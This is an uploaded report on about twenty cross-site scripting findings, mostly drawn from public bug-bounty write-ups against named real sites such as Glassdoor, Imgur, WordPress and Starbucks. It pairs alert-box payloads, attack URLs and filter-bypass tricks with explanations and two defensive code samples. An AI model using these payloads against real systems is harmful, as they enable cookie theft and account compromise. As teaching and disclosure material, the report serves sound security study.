Report of XSS-1

Uploaded by morape9233

Report of XSS

1. Reflected XSS

• When you type the XSS code <h1 onauxclick=confirm(document.domain)>RIGHT CLICK HERE into the message box, it shows up on the page without being checked for safety.
• If you right-click on "RIGHT CLICK HERE", the onauxclick handler runs and shows a popup with the website's name.
• An attacker could change this code to do harmful things, like stealing your information or redirecting you to a bad site.

2. Reflected XSS

• There's a reflected XSS vulnerability on the Glassdoor website through the utm_source parameter.
• This parameter doesn't check or clean up URL-encoded values properly.
• Using the payload abc`;return false});});alert`xss`;</script>, a popup with "xss" is shown.
• The code tricks the page into running the injected script.
• This allows attackers to add their own code, which can lead to harmful actions like stealing information.
Example:
• https://www.glassdoor.com/employers/sem-dual-lp/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
• abc`: the text itself is arbitrary and can be ignored, but the backtick (`) after it closes the JavaScript string the parameter is written into, allowing the payload to escape the current JavaScript context.
• ;return false});});: This part closes out the existing function calls and control structures so that what follows is valid JavaScript.
• alert`xss`;: This is where the actual attack occurs; it calls alert as a tagged template (no parentheses needed), triggering an alert with the message "xss".
• </script>: This closes the script tag, so the injected code is parsed and run.

3. Stored XSS Imgur.com

• Parameter: the vulnerability is found in the create album feature on Imgur, specifically when handling user input.
• Payload used: "/>&lt;script>alert(1)&lt;/script>"/>
• Remediation: the original report indicated that filtering for < and > was implemented, but my bypass using HTML entities shows that the filtering is insufficient.
• Impact: this reflected XSS vulnerability can allow attackers to steal cookies, passwords, or execute arbitrary code in a victim's browser, leading to serious security risks.

4. Stored XSS in wordpress.com

• Login: A user logs into their WordPress account.
• Choose a Post: They select an existing post to comment on.
• Add the Payload: They insert the following code as a comment:
<iframe><a href=javascript:alert(document.cookie)>Click Here</a></iframe>
• Saving the Comment: This comment is saved to the site.
• User Interaction: When other users view this post and click on "Click Here", an alert pops up showing their cookies from the wordpress.com domain.
Payload explained
• Iframe Tag: <iframe> is included but doesn't serve a purpose here. It's just a container that can hold another webpage.
• Anchor Tag: <a href=javascript:alert(document.cookie)>Click Here</a> is the main part.
• href: The href attribute starts with javascript:, which means clicking the link runs JavaScript code instead of navigating to a new page.

5. Stored XSS in report field

Stored XSS can be submitted in reports, and whenever someone views the report, the XSS will be triggered.
Payload: "><img src=x onerror=alert(document.domain)>

Explanation of Payload:
o ">: closes the attribute value and tag the name is written into; <img src=x then starts a new HTML tag that attempts to load an image.
o onerror=alert(document.domain) means that if the image fails to load (which it will, since x is not a real image), it will trigger an alert showing the current domain.
Steps:
• Go to https://app.mopub.com/reports/custom/.
• Click on New network report.
• In the name field, enter the payload: "><img src=x onerror=alert(document.domain)>.
• Click Run and save; the XSS will trigger when the report is accessed.
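
The fix for the attribute-breakout payloads in section 5 (and sections 3 and 6) and for the JavaScript-context breakout in the Glassdoor case of section 2 is the same in principle: encode untrusted data for the exact context it is written into. The block below is an added example, not code from any of the sites in this report; the two render functions and the "report name" and utm_source variable names are hypothetical.

```javascript
// Added example: context-aware output encoding that neutralises the report's payloads.
// The render functions and variable names are hypothetical, not from any reported site.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// HTML body text and double-quoted attribute values: escaping the five significant
// characters means a stored name can never close the attribute or open a new tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Data placed inside a JavaScript string literal in a <script> block (the utm_source
// case): encode every character except [A-Za-z0-9] as \xHH or \uHHHH, so backticks,
// quotes, braces and "</script>" stay inside the literal as inert data.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0); // UTF-16 code units; astral chars become two \u escapes
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Hypothetical server-side template that shows a report name in a form field and a
// heading (the two places where section 5's payload would otherwise break out).
function renderReportName(name) {
  const safe = escapeHtml(name);
  return `<input name="report" value="${safe}"><h2>${safe}</h2>`;
}

// Hypothetical template that copies a query parameter into inline script (section 2).
function renderUtmSource(utmSource) {
  return `<script>var utm_source = "${escapeJsString(utmSource)}";</script>`;
}

// Constructed samples: the two payloads quoted in the report.
const ATTR_PAYLOAD = '"><img src=x onerror=alert(document.domain)>';
const JS_PAYLOAD = "abc`;return false});});alert`xss`;</script>";

console.log(renderReportName(ATTR_PAYLOAD)); // no <img> tag survives
console.log(renderUtmSource(JS_PAYLOAD));    // string literal stays closed, no </script>
```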

6. Stored XSS
• The attacker changes a member's name to include harmful code. When an admin looks at the activity log, this code runs and shows a popup, which can let the attacker steal the admin's cookies.

• Payload: hunter"><svg/onload=alert(2)>
• hunter">: "hunter" is an ordinary name; the "> that follows ends the name field's attribute and tag, allowing the next part to be added as new markup.
• <svg/onload=alert(2)>: This creates an empty SVG image whose onload handler shows a popup saying "2" when the page loads.
• https://hackerone.com/reports/391390

7. Stored XSS

• The harmful code is submitted by the attacker and stored on the victim's blog. When the victim later edits the post, the stored code executes in their browser. This type of XSS persists because it remains on the server and affects users who interact with that content later.
• Submit a Post: The attacker goes to the victim's blog and creates a post with a link that contains harmful code (like javascript://x.com%0aalert(1);).
• Victim Edits Post: When the victim checks their inbox and edits that post, they click a link that runs the harmful code.
• Triggering the XSS: This code will then execute, showing an alert with the victim's domain, proving that the attack worked.
• javascript://: The javascript: scheme tells the browser to run what follows as JavaScript instead of going to a web page; the // straight after it opens a JavaScript line comment.
• x.com: This part is just a fake website name; it sits inside the comment, so it doesn't do anything here except make the value look like an ordinary URL.
• %0a: This is a URL-encoded line break; it ends the comment so the next line is executed.
• alert(1);: This is the actual command that pops up a message box showing the number "1".
• https://hackerone.com/reports/949382

8. Reflected XSS

• When a user clicks this link, if the website doesn't check the input properly, it will run the harmful JavaScript code in the user's browser. This shows that the attack worked and could allow the attacker to do more bad things, like steal cookies or personal information.
• URL: https://panther.com/search/test<svg on onload=(alert)(document.domain)>
• Payload: test<svg on onload=(alert)(document.domain)>
• <svg> Element: The payload injects an SVG image tag.
• onload Attribute: When the SVG is loaded, it triggers the JavaScript code.
• alert(document.domain): This code shows an alert box displaying the current domain, which proves the XSS worked.

9. Reflected XSS in starbucks.com

• URL: https://www.starbucks.com/account/signin?ReturnUrl=%19Jav%09asc%09ript%3ahttps%20%3a%2f%2fwww%2estarbucks%2ecom%2f%250Aalert%2528document.domain%2529
• Payload (URL-decoded once): %19Jav%09asc%09ript:https://www.starbucks.com/%0Aalert(document.domain), i.e. a javascript: link with a control character and tab characters inserted into the scheme name.
• %19Jav%09asc%09ript:: This is "javascript:" with a %19 control character in front of it and %09 tab characters inside it. A check that looks for the literal text "javascript:" doesn't recognise it, but the browser strips leading control characters and tabs from a URL before reading the scheme, so it runs the code anyway.
• https://www.starbucks.com/: This looks like a regular website link, but inside the javascript: URL it is JavaScript: "https:" is a label and "//" starts a comment, so the rest of that line is ignored.
• %0A: A URL-encoded line break that ends the comment.
• alert(document.domain): This part makes a popup appear that shows the name of the website you're on.
• https://hackerone.com/reports/438240

10. Reflected XSS

• URL: https://exchangemarketplace.com/blogsearch?q=OnMoUsEoVeR=prompt(/hacked/)//
• https://exchangemarketplace.com/blogsearch: This is the search page.
• q=: This part is for the search term.
• OnMoUsEoVeR=prompt(/hacked/): This is the harmful code that will run when the mouse moves over the element the search term is reflected into; HTML attribute names are case-insensitive, so the mixed capitalisation is a common way past a filter that only matches the lower-case "onmouseover".
• //: Anything after it is ignored.
• https://hackerone.com/reports/1145162

11. Stored XSS

• Payload: <a href="accesskey=x onclick=alert(document.domain)//"></a>
• <a> Tag: This is a link, like a clickable text or button.
• href="accesskey=x": This part is trying to set up a shortcut key (the letter x) to activate the link.
• onclick=alert(document.domain): This is what happens when the link is clicked or activated. It runs a piece of JavaScript that shows a popup with the website's name.
• //: This is used to ignore anything that comes after it in the code.
• https://hackerone.com/reports/592316

12. Stored XSS in Shopify Chat

• Payload: javascript:alert(1)//https://dqdqdqdqdq.myshopify.com
• javascript:: This part tells the browser to run some JavaScript code.
• alert(1): This is the code that creates a popup that shows the number 1.
• //: This means that anything after it is ignored, so the URL doesn't affect the code.
• https://dqdqdqdqdq.myshopify.com: This is a website link, but it's just ignored because of the //.
• https://hackerone.com/reports/756729
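
Sections 7, 9 and 12 all depend on a javascript: URL being accepted as a link target. A check for the literal text "javascript:" misses the Starbucks variant because the browser strips leading control characters and all tab and newline characters before it reads the scheme. The block below is an added example, not code from any site in the report: it validates link targets with the WHATWG URL parser (Node's global URL), which applies the same stripping a browser does, and then allows only an explicit scheme allowlist. The base URL and the sample inputs are constructed from the payload shapes quoted above.

```javascript
// Added example: allowlist-based href validation. Not code from any reported site;
// the base URL and the sample inputs below are constructed for the demonstration.

const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Naive check of the kind the report's payloads get past: look for the literal prefix.
function naiveIsSafeHref(raw) {
  return !raw.toLowerCase().startsWith("javascript:");
}

// Robust check: the WHATWG URL parser strips leading C0 controls/spaces and every
// tab or newline exactly as a browser does, then we compare the resulting scheme
// against an allowlist. Relative links resolve against `base` and are accepted.
function isSafeHref(raw, base = "https://example.invalid/") {
  let url;
  try {
    url = new URL(raw, base);
  } catch {
    return false; // unparseable: reject rather than guess
  }
  return SAFE_SCHEMES.has(url.protocol);
}

// Constructed samples modelled on sections 7, 9 and 12 of the report.
const SAMPLES = {
  plain: "https://www.starbucks.com/",
  relative: "/reports/custom/",
  shopifyChat: "javascript:alert(1)//https://dqdqdqdqdq.myshopify.com",
  inboxLink: "javascript://x.com%0aalert(1);",
  // %19 (control character) and %09 (tab) from the Starbucks ReturnUrl, decoded once
  starbucks: "\x19Jav\tasc\tript:https://www.starbucks.com/%0Aalert(document.domain)",
};

// Returns { name: [naiveVerdict, robustVerdict] } so the two checks can be compared;
// true means "allowed as a link target".
function compareChecks(samples = SAMPLES) {
  const out = {};
  for (const [name, raw] of Object.entries(samples)) {
    out[name] = [naiveIsSafeHref(raw), isSafeHref(raw)];
  }
  return out;
}

console.table(compareChecks()); // only "starbucks" differs: naive true, robust false
```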

13. Reflected XSS

• https://blocked.myndr.net/?trg="><script>alert(1)</script>
• Payload: ?trg="><script>alert(1)</script>
• ?trg=: This part is asking for some information using the trg parameter in the URL.
• ": This is a double quote. It's used here to close an HTML attribute value that was opened earlier.
• >: This is a greater-than sign. It tells the browser that the previous tag is finished, so the <script>alert(1)</script> that follows is parsed as a new tag and run.

14. Reflected XSS

• In the store settings, change the currency format by adding this code: €{{amount}}"><img src=x onerror=prompt(document.domain)>.
• This code tricks the website into running a script when the buy button is displayed.
• When triggered, it shows a pop-up message with the website's domain, demonstrating an XSS vulnerability.
• €{{amount}}: This shows a price in euros. The {{amount}} is where the actual price goes.
• ": This closes the attribute the price is written into, letting new code start.
• >: This marks the end of the tag, allowing new code to run.
• <img src=x: This tries to show an image, but src=x doesn't point to a real image, so it won't load.
• onerror=prompt(document.domain): If the image doesn't load, this code runs and shows a pop-up with the website's name.

15. Reflected XSS on gratipay.com

• https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>
• %00: This is a special character called a null character. It can confuse the website into thinking the input ends here.
• A: This is just the letter "A". It might be included to make the input look normal.
• <svg onload=alert(1)>:
o <svg>: This is a tag used for drawing pictures on a webpage.
o onload=alert(1): This part means that when the picture is loaded, it will show a pop-up message with the number 1.

16. Stored XSS in backup scanning plan name

• You can create an XSS vulnerability in the Acronis console by naming a backup plan with the code: /><svg/onload=prompt(document.domain)>.
• After creating the plan, a pop-up alert will appear multiple times when you try to edit it.
• This demonstrates that the system is vulnerable to XSS attacks.

17. XSS in Email Input [intensedebate.com]

• Payload: "><img src=x onerror=alert(document.cookie);>
• https://hackerone.com/reports/1037714

18. Stored XSS

• Go to Email Templates: Navigate to Requests > Email Templates in your Shopify store.
• Create New Template: Click on "New Templates" to start creating a new email.
• Edit the Block: Edit the relevant block where you want to add the link.
• Insert XSS Payload: Add a link with an XSS payload (as shown in the screenshot).
• Save the Email: Save the email template after inserting the payload.
• Trigger the XSS: Click on the text "Click Here" to activate the XSS.
• Payload: https://"><img src=x onerror=prompt(document.domain)>{{7**7'}}
• https://: This looks like a web address but is part of the code injection.
• ">: These symbols close the attribute and tag the link is written into, allowing new code to be added.
• <img src=x: This tries to add an image, but src=x isn't a real image link, so it won't load.
• onerror=prompt(document.domain): If the image doesn't load, this runs a script that shows a pop-up with the website's name.
• >{{7**7'}}: This part appears to be a template-injection probe; if the template engine evaluated it, the result of 7 to the power of 7 would appear in the output, revealing a second way to trick the system.

19. Reflected XSS stripo.email

• https://stripo.email//templates/merry-christmas-email-template-winter-inspiration-gifts-flowers-industry%3E%22%27%3E%3Cscript%3Ealert%281578%29%3C%2Fscript%3E
• Payload: >"'><script>alert(1578)</script>
• >: Greater-than symbol, used to close an HTML tag.
• ": Double quote, commonly used in HTML attributes.
• ': Single quote, also used in HTML attributes.
• >: Another greater-than symbol, indicating the end of a tag.
• <script>alert(1578)</script>: The script tag that actually runs, showing a popup with the number 1578.
• https://hackerone.com/reports/714521

20. Self XSS

• Self-XSS:
o Occurs when a user runs harmful code in their own browser.
o The user is tricked into executing the code they input themselves.
• Payload Explanation:
o The payload ("><img src=xx onerror=alert(document.domain)>) creates an image tag.
o If the image fails to load, it triggers an alert showing the website's domain.
• User Action:
o The vulnerability relies on the user uploading a file with malicious code.
o This affects only the user who performs the action, not other users.
• https://hackerone.com/reports/982510
